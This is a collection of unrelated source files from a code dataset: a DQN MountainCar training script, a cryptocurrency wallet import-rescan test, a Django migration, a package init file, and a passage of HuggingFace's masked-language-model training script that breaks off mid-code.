mtcar-lossgraph/mountaincar-solver-lossgraph.py
hushon/son-dqn
08b9bdce8b570a629b8484d21b06146335f5907e
[ "Apache-2.0" ]
null
null
null
## Original implementation from https://github.com/ageron/tiny-dqn ## Edited to solve OpenAI Gym classic environments by github.com/hushon from __future__ import division, print_function, unicode_literals # Handle arguments (before slow imports so --help can be fast) import argparse parser = argparse.ArgumentParser( description="Train a DQN net to play OpenAI Gym classic environments.") parser.add_argument("-e", "--environment", action="store", default="MountainCar-v0", help="name of the Gym environment") parser.add_argument("-n", "--number-steps", type=int, default=10000, help="total number of training steps") parser.add_argument("-l", "--learn-iterations", type=int, default=1, help="number of game iterations between each training step") parser.add_argument("-s", "--save-steps", type=int, default=400, help="number of training steps between saving checkpoints") parser.add_argument("-c", "--copy-steps", type=int, default=20, help="number of training steps between copies of online DQN to target DQN") parser.add_argument("-r", "--render", action="store_true", default=False, help="render the game during training or testing") parser.add_argument("-p", "--path", default="./MountainCar-v0/my_dqn.ckpt", help="path of the checkpoint file") parser.add_argument("-t", "--test", action="store_true", default=False, help="test (no learning and minimal epsilon)") parser.add_argument("-v", "--verbosity", action="count", default=0, help="increase output verbosity") args = parser.parse_args() from time import sleep from collections import deque import gym from gym import wrappers import numpy as np import os import tensorflow as tf import matplotlib.pyplot as plt env = gym.make(args.environment) if args.test: env = wrappers.Monitor(env, args.path+'/mountaincar-experiment-1') done = True # env needs to be reset # First let's build the two DQNs (online & target) n_outputs = env.action_space.n # 3 discrete actions are available num_outputs_list = [1024, 512] # number of units in input layer and hidden layer activation_list = [tf.nn.relu, tf.nn.relu] # activation function in input layer and hidden layer weights_initializer = tf.contrib.layers.xavier_initializer() # biases_initializer = tf.zeros_initializer() biases_initializer = tf.contrib.layers.xavier_initializer() def q_network(X_state, name): prev_layer = X_state with tf.variable_scope(name) as scope: # input layer and hidden layers for num_outputs, activation in zip(num_outputs_list, activation_list): prev_layer = tf.contrib.layers.fully_connected( prev_layer, num_outputs, activation_fn=activation, normalizer_fn=None, normalizer_params=None, weights_initializer=weights_initializer, weights_regularizer=None, biases_initializer=biases_initializer, biases_regularizer=None, reuse=None, variables_collections=None, outputs_collections=None, trainable=True, scope=None) # output layer outputs = tf.contrib.layers.fully_connected( prev_layer, n_outputs, activation_fn=None, normalizer_fn=None, normalizer_params=None, weights_initializer=weights_initializer, weights_regularizer=None, biases_initializer=biases_initializer, biases_regularizer=None, reuse=None, variables_collections=None, outputs_collections=None, trainable=True, scope=None) trainable_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope.name) trainable_vars_by_name = {var.name[len(scope.name):]: var for var in trainable_vars} return outputs, trainable_vars_by_name # state_shape = (2*np.prod(env.observation_space.shape), ) state_shape = (np.prod(env.observation_space.shape), ) X_state = tf.placeholder(tf.float32, shape=[None]+list(state_shape)) online_q_values, online_vars = q_network(X_state, name="q_networks/online") target_q_values, target_vars = q_network(X_state, name="q_networks/target") # We need an operation to copy the online DQN to the target DQN copy_ops = [target_var.assign(online_vars[var_name]) for var_name, target_var in target_vars.items()] copy_online_to_target = tf.group(*copy_ops) # Now for the training operations learning_rate = 0.2 momentum = 0.0 with tf.variable_scope("train"): X_action = tf.placeholder(tf.int32, shape=[None]) y = tf.placeholder(tf.float32, shape=[None, 1]) q_value = tf.reduce_sum(online_q_values * tf.one_hot(X_action, n_outputs), axis=1, keep_dims=True) error = tf.abs(y - q_value) # clipped_error = tf.clip_by_value(error, 0.0, 1.0) # linear_error = 2 * (error - clipped_error) # loss = tf.reduce_mean(tf.square(clipped_error) + linear_error) loss = tf.reduce_mean(tf.square(error)) global_step = tf.Variable(0, trainable=False, name='global_step') optimizer = tf.train.MomentumOptimizer( learning_rate, momentum, use_nesterov=True) training_op = optimizer.minimize(loss, global_step=global_step) init = tf.global_variables_initializer() saver = tf.train.Saver() # Let's implement a simple replay memory # replay_memory_size = 20000 replay_memory_size = 50000 replay_memory = deque([], maxlen=replay_memory_size) def sample_memories(batch_size): indices = np.random.permutation(len(replay_memory))[:batch_size] cols = [[], [], [], [], []] # state, action, reward, next_state, continue for idx in indices: memory = replay_memory[idx] for col, value in zip(cols, memory): col.append(value) cols = [np.array(col) for col in cols] return (cols[0], cols[1], cols[2].reshape(-1, 1), cols[3], cols[4].reshape(-1, 1)) # And on to the epsilon-greedy policy with decaying epsilon eps_min, eps_max = (0.5, 1.0) if not args.test else (0.0, 0.0) eps_decay_steps = args.number_steps // 2 # eps_decay_steps = args.number_steps def epsilon_greedy(q_values, step): epsilon = max(eps_min, eps_max - (eps_max-eps_min) * step/eps_decay_steps) if np.random.rand() < epsilon: print("random") return np.random.randint(n_outputs) # random action else: return np.argmax(q_values) # optimal action # We need to preprocess the images to speed up training # preprocessor merges observations and returnes a flattened array def preprocess_observation(*arg): obs_stacked = np.vstack(arg) obs_stacked = np.around(obs_stacked, decimals=4) # q = 0.01 # obs_stacked = q*np.round(obs_stacked/q) return obs_stacked.reshape(-1) # TensorFlow - Execution phase training_start = 0 # start training after 10,000 game iterations discount_rate = 1.00 skip_start = 0 # Skip the start of every game (it's just waiting time). batch_size = 500 iteration = 0 # game iterations done = True # env needs to be reset # We will keep track of the max Q-Value over time and compute the mean per game loss_val = np.infty game_length = 0 total_max_q = 0 mean_max_q = 0.0 # flag for successful game success = False # flag for intrinsic reward check1 = False check2 = False check3 = False # frame skipping by k frames skip_k = 10 # for plotting loss plt.figure(1) loss_list = np.zeros(args.number_steps) with tf.Session() as sess: if os.path.isfile(args.path + ".index"): saver.restore(sess, args.path) else: init.run() copy_online_to_target.run() while True: step = global_step.eval() if step >= args.number_steps and not args.test: break iteration += 1 if args.verbosity > 0: print("\rIteration {} Training step {}/{} ({:.1f})% Loss {:5f} Mean Max-Q {:5f} ".format( iteration, step, args.number_steps, step * 100 / args.number_steps, loss_val, mean_max_q), end="") if done: # game over, start again print("Game Over") obs = env.reset() for skip in range(skip_start): # skip the start of each game obs, reward, done, info = env.step(0) # state = preprocess_observation(obs, obs) state = preprocess_observation(obs) obs_old = obs if args.render: env.render() # Online DQN evaluates what to do print(state) q_values = online_q_values.eval(feed_dict={X_state: [state]}) print(q_values) action = epsilon_greedy(q_values, step) print(("left", "stay", "right")[action]) # Online DQN plays # for k in range(skip_k): # obs, reward, done, info = env.step(action) # if reward > -1.0: # break obs, reward, done, info = env.step(action) # next_state = preprocess_observation(obs, obs_old) next_state = preprocess_observation(obs) obs_old = obs # flag for success if obs[0]-4.9 >= 0: success=True done = True reward = 100.0 if success: print("successful episode observed") # reward manipulation # coeff = -1e3 # reward += coeff*(state[0]-state[2])*(-1,0,1)[action] # print(reward) # coeff = 1e5 # reward += coeff*np.square(state[3]) # print(reward) # coeff=4 # intrinsic_reward = coeff*(np.square(state[0]+0.5)+160.0*np.square(state[1])) # print(intrinsic_reward) # reward += intrinsic_reward # if not check1 and not check2 and not check3 and obs[0]<-0.7: # reward = 0.0 # check1 = True # elif check1 and not check2 and not check3 and obs[0]>-0.3: # reward = 0.0 # check2 = True # elif check1 and check2 and not check3 and obs[0]>0.0: # reward = 0.0 # check3 = True # Let's memorize what happened replay_memory.append((state, action, reward, next_state, 1.0 - done)) state = next_state if args.test: continue # Compute statistics for tracking progress (not shown in the book) total_max_q += q_values.max() game_length += 1 if done: mean_max_q = total_max_q / game_length total_max_q = 0.0 game_length = 0 if iteration > training_start and iteration % args.learn_iterations == 0: # only train after warmup period and at regular intervals # Sample memories and use the target DQN to produce the target Q-Value X_state_val, X_action_val, rewards, X_next_state_val, continues = (sample_memories(batch_size)) next_q_values = target_q_values.eval(feed_dict={X_state: X_next_state_val}) max_next_q_values = np.max(next_q_values, axis=1, keepdims=True) y_val = rewards + continues * discount_rate * max_next_q_values # Train the online DQN _, loss_val = sess.run([training_op, loss], feed_dict={X_state: X_state_val, X_action: X_action_val, y: y_val}) loss_list[step] = loss_val # Regularly copy the online DQN to the target DQN if step % args.copy_steps == 0: copy_online_to_target.run() # And save regularly if step % args.save_steps == 0: saver.save(sess, args.path) plt.plot(np.arange(args.number_steps), loss_list) plt.savefig('./MountainCar-v0/loss_chart.png')
38.820598
123
0.653059
ab09950d7f6955e84d0ecf8c7fc0aa0c515b90d8
8,481
py
Python
test/functional/wallet_import_rescan.py
reeccoin/REEC
eb388d692aa7039dfe78247c829e4d348ff1f631
[ "MIT" ]
2
2020-11-28T13:09:16.000Z
2020-12-05T21:01:07.000Z
test/functional/wallet_import_rescan.py
reeccoin/REEC
eb388d692aa7039dfe78247c829e4d348ff1f631
[ "MIT" ]
null
null
null
test/functional/wallet_import_rescan.py
reeccoin/REEC
eb388d692aa7039dfe78247c829e4d348ff1f631
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2014-2017 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test wallet import RPCs. Test rescan behavior of importaddress, importpubkey, importprivkey, and importmulti RPCs with different types of keys and rescan options. In the first part of the test, node 0 creates an address for each type of import RPC call and sends BTC to it. Then other nodes import the addresses, and the test makes listtransactions and getbalance calls to confirm that the importing node either did or did not execute rescans picking up the send transactions. In the second part of the test, node 0 sends more BTC to each address, and the test makes more listtransactions and getbalance calls to confirm that the importing nodes pick up the new transactions regardless of whether rescans happened previously. """ from test_framework.test_framework import ReeccoinTestFramework from test_framework.util import (assert_raises_rpc_error, connect_nodes, sync_blocks, assert_equal, set_node_times) import collections import enum import itertools Call = enum.Enum("Call", "single") Data = enum.Enum("Data", "address pub priv") Rescan = enum.Enum("Rescan", "no yes late_timestamp") class Variant(collections.namedtuple("Variant", "call data rescan prune")): """Helper for importing one key and verifying scanned transactions.""" def try_rpc(self, func, *args, **kwargs): if self.expect_disabled: assert_raises_rpc_error(-4, "Rescan is disabled in pruned mode", func, *args, **kwargs) else: return func(*args, **kwargs) def do_import(self, timestamp): """Call one key import RPC.""" rescan = self.rescan == Rescan.yes if self.call == Call.single: if self.data == Data.address: response = self.try_rpc(self.node.importaddress, self.address["address"], self.label, rescan) elif self.data == Data.pub: response = self.try_rpc(self.node.importpubkey, self.address["pubkey"], self.label, rescan) elif self.data == Data.priv: response = self.try_rpc(self.node.importprivkey, self.key, self.label, rescan) assert_equal(response, None) elif self.call == Call.multi: response = self.node.importmulti([{ "scriptPubKey": { "address": self.address["address"] }, "timestamp": timestamp + TIMESTAMP_WINDOW + (1 if self.rescan == Rescan.late_timestamp else 0), "pubkeys": [self.address["pubkey"]] if self.data == Data.pub else [], "keys": [self.key] if self.data == Data.priv else [], "label": self.label, "watchonly": self.data != Data.priv }], {"rescan": self.rescan in (Rescan.yes, Rescan.late_timestamp)}) assert_equal(response, [{"success": True}]) def check(self, txid=None, amount=None, confirmations=None): """Verify that listreceivedbyaddress returns return expected values.""" addresses = self.node.listreceivedbyaddress(0, True, self.address['address']) if self.expected_txs: assert_equal(len(addresses[0]["txids"]), self.expected_txs) if txid is not None: address, = [ad for ad in addresses if txid in ad["txids"]] assert_equal(address["address"], self.address["address"]) assert_equal(address["amount"], self.expected_balance) assert_equal(address["confirmations"], confirmations) # Verify the transaction is correctly marked watchonly depending on # whether the transaction pays to an imported public key or # imported private key. The test setup ensures that transaction # inputs will not be from watchonly keys (important because # involvesWatchonly will be true if either the transaction output # or inputs are watchonly). if self.data != Data.priv: assert_equal(address["involvesWatchonly"], True) else: assert_equal("involvesWatchonly" not in address, True) # List of Variants for each way a key or address could be imported. IMPORT_VARIANTS = [Variant(*variants) for variants in itertools.product(Call, Data, Rescan, (False, True))] # List of nodes to import keys to. Half the nodes will have pruning disabled, # half will have it enabled. Different nodes will be used for imports that are # expected to cause rescans, and imports that are not expected to cause # rescans, in order to prevent rescans during later imports picking up # transactions associated with earlier imports. This makes it easier to keep # track of expected balances and transactions. ImportNode = collections.namedtuple("ImportNode", "prune rescan") IMPORT_NODES = [ImportNode(*fields) for fields in itertools.product((False, True), repeat=2)] # Rescans start at the earliest block up to 2 hours before the key timestamp. TIMESTAMP_WINDOW = 2 * 60 * 60 class ImportRescanTest(ReeccoinTestFramework): def set_test_params(self): self.num_nodes = 2 + len(IMPORT_NODES) def setup_network(self): extra_args = [["-addresstype=legacy",] for _ in range(self.num_nodes)] for i, import_node in enumerate(IMPORT_NODES, 2): if import_node.prune: extra_args[i] += ["-prune=1"] self.add_nodes(self.num_nodes, extra_args) self.start_nodes() for i in range(1, self.num_nodes): connect_nodes(self.nodes[i], 0) def run_test(self): # Create one transaction on node 0 with a unique amount for # each possible type of wallet import RPC. for i, variant in enumerate(IMPORT_VARIANTS): variant.address = self.nodes[1].validateaddress(self.nodes[1].getnewaddress()) variant.key = self.nodes[1].dumpprivkey(variant.address["address"]) variant.initial_amount = 10 - (i + 1) / 4.0 variant.initial_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.initial_amount) # Generate a block containing the initial transactions, then another # block further in the future (past the rescan window). self.nodes[0].generate(1) assert_equal(self.nodes[0].getrawmempool(), []) timestamp = self.nodes[0].getblockheader(self.nodes[0].getbestblockhash())["time"] set_node_times(self.nodes, timestamp + TIMESTAMP_WINDOW + 1) self.nodes[0].generate(1) sync_blocks(self.nodes) # For each variation of wallet key import, invoke the import RPC and # check the results from getbalance and listtransactions. for variant in IMPORT_VARIANTS: variant.expect_disabled = variant.rescan == Rescan.yes and variant.prune and variant.call == Call.single expect_rescan = variant.rescan == Rescan.yes and not variant.expect_disabled variant.node = self.nodes[2 + IMPORT_NODES.index(ImportNode(variant.prune, expect_rescan))] variant.do_import(timestamp) if expect_rescan: variant.expected_balance = variant.initial_amount variant.expected_txs = 1 variant.check(variant.initial_txid, variant.initial_amount, 2) else: variant.expected_balance = 0 variant.expected_txs = 0 variant.check() # Create new transactions sending to each address. for i, variant in enumerate(IMPORT_VARIANTS): variant.sent_amount = 10 - (2 * i + 1) / 8.0 variant.sent_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.sent_amount) # Generate a block containing the new transactions. self.nodes[0].generate(1) assert_equal(self.nodes[0].getrawmempool(), []) sync_blocks(self.nodes) # Check the latest results from getbalance and listtransactions. for variant in IMPORT_VARIANTS: if not variant.expect_disabled: variant.expected_balance += variant.sent_amount variant.expected_txs += 1 variant.check(variant.sent_txid, variant.sent_amount, 1) else: variant.check() if __name__ == "__main__": ImportRescanTest().main()
47.379888
116
0.666431
3a2950318764046c328bae914582abfee31aa3e2
445
py
Python
apps/exams/migrations/0010_auto_20200410_1559.py
alfarhanzahedi/edumate
76ced0063d25431098babb1d163c95c9ddaf3307
[ "MIT" ]
1
2021-11-28T14:18:16.000Z
2021-11-28T14:18:16.000Z
apps/exams/migrations/0010_auto_20200410_1559.py
alfarhanzahedi/edumate
76ced0063d25431098babb1d163c95c9ddaf3307
[ "MIT" ]
1
2022-02-10T10:53:12.000Z
2022-02-10T10:53:12.000Z
apps/exams/migrations/0010_auto_20200410_1559.py
alfarhanzahedi/edumate
76ced0063d25431098babb1d163c95c9ddaf3307
[ "MIT" ]
null
null
null
# Generated by Django 2.2.8 on 2020-04-10 15:59 import ckeditor_uploader.fields from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('exams', '0009_auto_20200410_1526'), ] operations = [ migrations.AlterField( model_name='answer', name='body', field=ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True), ), ]
22.25
89
0.640449
9c9b0c088becdb658f77557dc352e8951ef478fd
86
py
Python
lanfactory/__init__.py
AlexanderFengler/LANfactory
78570d488c64907ef7dcf2161581a03746d0e45b
[ "MIT" ]
1
2021-07-15T03:49:28.000Z
2021-07-15T03:49:28.000Z
lanfactory/__init__.py
AlexanderFengler/LANfactory
78570d488c64907ef7dcf2161581a03746d0e45b
[ "MIT" ]
null
null
null
lanfactory/__init__.py
AlexanderFengler/LANfactory
78570d488c64907ef7dcf2161581a03746d0e45b
[ "MIT" ]
null
null
null
__version__ = '0.0.2' from . import config from . import trainers from . import utils
17.2
22
0.732558
bbcced59a030fde0ab77438bbf6a9c57daa000d4
24,177
py
Python
examples/pytorch/language-modeling/run_mlm.py
InfluencerNGZK/transformers
33080a0a29f849649ade9ef351d5744b5b0ddefe
[ "Apache-2.0" ]
null
null
null
examples/pytorch/language-modeling/run_mlm.py
InfluencerNGZK/transformers
33080a0a29f849649ade9ef351d5744b5b0ddefe
[ "Apache-2.0" ]
null
null
null
examples/pytorch/language-modeling/run_mlm.py
InfluencerNGZK/transformers
33080a0a29f849649ade9ef351d5744b5b0ddefe
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Team All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for masked language modeling (BERT, ALBERT, RoBERTa...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=masked-lm """ # You can also adapt this script on your own masked language modeling task. Pointers for this are left as comments. import logging import math import os import sys from dataclasses import dataclass, field from typing import Optional import datasets from datasets import load_dataset import transformers from transformers import ( CONFIG_MAPPING, MODEL_FOR_MASKED_LM_MAPPING, AutoConfig, AutoModelForMaskedLM, AutoTokenizer, DataCollatorForLanguageModeling, HfArgumentParser, Trainer, TrainingArguments, set_seed, ) from transformers.trainer_utils import get_last_checkpoint from transformers.utils import check_min_version from transformers.utils.versions import require_version # Will error if the minimal version of Transformers is not installed. Remove at your own risks. check_min_version("4.12.0") require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_FOR_MASKED_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": "The model checkpoint for weights initialization." "Don't set if you want to train a model from scratch." }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": "Will use the token generated when running `transformers-cli login` (necessary to use this script " "with private models)." }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ dataset_name: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_file: Optional[str] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[int] = field( default=5, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) max_seq_length: Optional[int] = field( default=None, metadata={ "help": "The maximum total input sequence length after tokenization. Sequences longer " "than this will be truncated." }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) mlm_probability: float = field( default=0.15, metadata={"help": "Ratio of tokens to mask for masked language modeling loss"} ) line_by_line: bool = field( default=False, metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."}, ) pad_to_max_length: bool = field( default=False, metadata={ "help": "Whether to pad all samples to `max_seq_length`. " "If False, will pad the samples dynamically when batching to the maximum length in the batch." }, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." }, ) def __post_init__(self): if self.dataset_name is None and self.train_file is None and self.validation_file is None: raise ValueError("Need either a dataset name or a training/validation file.") else: if self.train_file is not None: extension = self.train_file.split(".")[-1] if extension not in ["csv", "json", "txt"]: raise ValueError("`train_file` should be a csv, a json or a txt file.") if self.validation_file is not None: extension = self.validation_file.split(".")[-1] if extension not in ["csv", "json", "txt"]: raise ValueError("`validation_file` should be a csv, a json or a txt file.") def main(): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", handlers=[logging.StreamHandler(sys.stdout)], ) log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) # Set the verbosity to info of the Transformers logger (on main process only): logger.info(f"Training/evaluation parameters {training_args}") # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below) # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/ # (the dataset will be downloaded automatically from the datasets Hub # # For CSV/JSON files, this script will use the column called 'text' or the first column. You can easily tweak this # behavior (see below) # # In distributed training, the load_dataset function guarantee that only one local process can concurrently # download the dataset. if data_args.dataset_name is not None: # Downloading and loading a dataset from the hub. raw_datasets = load_dataset( data_args.dataset_name, data_args.dataset_config_name, cache_dir=model_args.cache_dir ) if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( data_args.dataset_name, data_args.dataset_config_name, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, ) raw_datasets["train"] = load_dataset( data_args.dataset_name, data_args.dataset_config_name, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, ) else: data_files = {} if data_args.train_file is not None: data_files["train"] = data_args.train_file extension = data_args.train_file.split(".")[-1] if data_args.validation_file is not None: data_files["validation"] = data_args.validation_file extension = data_args.validation_file.split(".")[-1] if extension == "txt": extension = "text" raw_datasets = load_dataset(extension, data_files=data_files, cache_dir=model_args.cache_dir) # If no validation data is there, validation_split_percentage will be used to divide the dataset. if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( extension, data_files=data_files, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, ) raw_datasets["train"] = load_dataset( extension, data_files=data_files, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, ) # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at # https://huggingface.co/docs/datasets/loading_datasets.html. # Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) if model_args.model_name_or_path: model = AutoModelForMaskedLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, ) else: logger.info("Training new model from scratch") model = AutoModelForMaskedLM.from_config(config) model.resize_token_embeddings(len(tokenizer)) # Preprocessing the datasets. # First we tokenize all the texts. if training_args.do_train: column_names = raw_datasets["train"].column_names else: column_names = raw_datasets["validation"].column_names text_column_name = "text" if "text" in column_names else column_names[0] if data_args.max_seq_length is None: max_seq_length = tokenizer.model_max_length if max_seq_length > 1024: logger.warning( f"The tokenizer picked seems to have a very large `model_max_length` ({tokenizer.model_max_length}). " "Picking 1024 instead. You can change that default value by passing --max_seq_length xxx." ) max_seq_length = 1024 else: if data_args.max_seq_length > tokenizer.model_max_length: logger.warning( f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the" f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}." ) max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length) if data_args.line_by_line: # When using line_by_line, we just tokenize each nonempty line. padding = "max_length" if data_args.pad_to_max_length else False def tokenize_function(examples): # Remove empty lines examples[text_column_name] = [ line for line in examples[text_column_name] if len(line) > 0 and not line.isspace() ] return tokenizer( examples[text_column_name], padding=padding, truncation=True, max_length=max_seq_length, # We use this option because DataCollatorForLanguageModeling (see below) is more efficient when it # receives the `special_tokens_mask`. return_special_tokens_mask=True, ) with training_args.main_process_first(desc="dataset map tokenization"): tokenized_datasets = raw_datasets.map( tokenize_function, batched=True, num_proc=data_args.preprocessing_num_workers, remove_columns=[text_column_name], load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on dataset line_by_line", ) else: # Otherwise, we tokenize every text, then concatenate them together before splitting them in smaller parts. # We use `return_special_tokens_mask=True` because DataCollatorForLanguageModeling (see below) is more # efficient when it receives the `special_tokens_mask`. def tokenize_function(examples): return tokenizer(examples[text_column_name], return_special_tokens_mask=True) with training_args.main_process_first(desc="dataset map tokenization"): tokenized_datasets = raw_datasets.map( tokenize_function, batched=True, num_proc=data_args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on every text in dataset", ) # Main data processing function that will concatenate all texts from our dataset and generate chunks of # max_seq_length. def group_texts(examples): # Concatenate all texts. concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()} total_length = len(concatenated_examples[list(examples.keys())[0]]) # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can # customize this part to your needs. if total_length >= max_seq_length: total_length = (total_length // max_seq_length) * max_seq_length # Split by chunks of max_len. result = { k: [t[i : i + max_seq_length] for i in range(0, total_length, max_seq_length)] for k, t in concatenated_examples.items() } return result # Note that with `batched=True`, this map processes 1,000 texts together, so group_texts throws away a # remainder for each of those groups of 1,000 texts. You can adjust that batch_size here but a higher value # might be slower to preprocess. # # To speed up this part, we use multiprocessing. See the documentation of the map method for more information: # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map with training_args.main_process_first(desc="grouping texts together"): tokenized_datasets = tokenized_datasets.map( group_texts, batched=True, num_proc=data_args.preprocessing_num_workers, load_from_cache_file=not data_args.overwrite_cache, desc=f"Grouping texts in chunks of {max_seq_length}", ) if training_args.do_train: if "train" not in tokenized_datasets: raise ValueError("--do_train requires a train dataset") train_dataset = tokenized_datasets["train"] if data_args.max_train_samples is not None: train_dataset = train_dataset.select(range(data_args.max_train_samples)) if training_args.do_eval: if "validation" not in tokenized_datasets: raise ValueError("--do_eval requires a validation dataset") eval_dataset = tokenized_datasets["validation"] if data_args.max_eval_samples is not None: eval_dataset = 